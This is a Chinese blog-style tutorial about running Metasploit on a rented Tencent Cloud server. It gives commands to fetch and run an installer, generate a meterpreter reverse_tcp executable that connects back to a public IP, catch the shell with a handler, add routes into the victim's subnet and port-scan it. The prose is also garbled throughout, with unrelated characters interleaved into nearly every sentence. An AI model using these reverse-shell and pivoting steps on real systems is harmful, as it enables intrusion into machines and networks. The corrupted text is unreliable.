前言
1個月前學(xué)習(xí)msf時陈莽,考慮到只在內(nèi)網(wǎng)測試沒什么意思底挫,于是我在騰訊云上租了個云服務(wù)器汗捡。騰訊云網(wǎng)絡(luò)架構(gòu)是由公網(wǎng)網(wǎng)卡和內(nèi)網(wǎng)網(wǎng)卡組成淑际,不過在云主機中使用ipconfig/ifconfig查看網(wǎng)絡(luò)接口信息時,只能看到內(nèi)網(wǎng)IP的信息扇住。?
首次搭建時春缕,我選擇了server2008鏡像,并在上面安裝了集成msf的pentestbox艘蹋。不幸的是锄贼,一切配置完成后,我在本地win7上運行msfvenom生成的exe文件簿训,云服務(wù)器上的msf并沒有獲得win7的shell咱娶。一開始我猜測是pentestbox的問題,于是把云服務(wù)器重裝成了Ubuntu系統(tǒng)强品。但是很遺憾膘侮,這次msf同樣沒有接收到本地win7反彈的shell。我開始懷疑是云服務(wù)器的外網(wǎng)--內(nèi)網(wǎng)映射的問題的榛,通過搜索得到了如下幾種答案:
? ? ?①公網(wǎng)ip很貴的琼了,騰訊云使用的是公共公網(wǎng)ip。
? ? ?②購買帶寬才會分配給你的云服務(wù)器公網(wǎng)IP地址夫晌。
? ? ?③云服務(wù)器雖然是內(nèi)網(wǎng)IP雕薪,但是全部NAT到了公網(wǎng),不需要手動做端口映射晓淀。
? ? ? ......
折騰了一陣子所袁,仍然沒有解決問題,最后我放棄了掙扎凶掰。燥爷。1個月后的今天,我突然想到這個事情懦窘,便登錄云服務(wù)器看了看前翎。這次我切換成root用戶運行msf,神奇的是畅涂,竟然測試成功了8刍!我也懶得糾結(jié)是什么原因了午衰,以下是正文......
1.登錄到Ubuntu系統(tǒng)后立宜,首先切換成root用戶
2.安裝metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
3.安裝postgresql數(shù)據(jù)庫
安裝數(shù)據(jù)庫時會自動創(chuàng)建系統(tǒng)用戶postgres冒萄、數(shù)據(jù)庫用戶postgres、數(shù)據(jù)庫postgres
apt-get install postgresql ? 安裝postgresql數(shù)據(jù)庫
su postgres ? 切換到postgres用戶
psql ? 登錄postgresql數(shù)據(jù)庫赘理,首次登錄沒有密碼
\password postgres ? 修改數(shù)據(jù)庫用戶postgres的密碼
4.metasploit的使用
msfvenom -p windows/meterpreter/reverse_tcp LHOST=118.89.216.104 LPORT=888 -f exe -o end.exe ?這次LHOST是公網(wǎng)IP
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.141.103.129 ?這里L(fēng)HOST是內(nèi)網(wǎng)IP
set LPORT 888
exploit
5.在本地win7上運行end.exe宦言,云服務(wù)器上的msf會獲得shell
添加到win7子網(wǎng)的路由表
run get_local_subnets ?查看win7的本地子網(wǎng)
run autoroute -s 192.168.80.0/24 ?添加路由表
run autoroute -p ?查看路由表
掃描win7所在的本地子網(wǎng)
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.80.0/24
set ports 139,445
exploit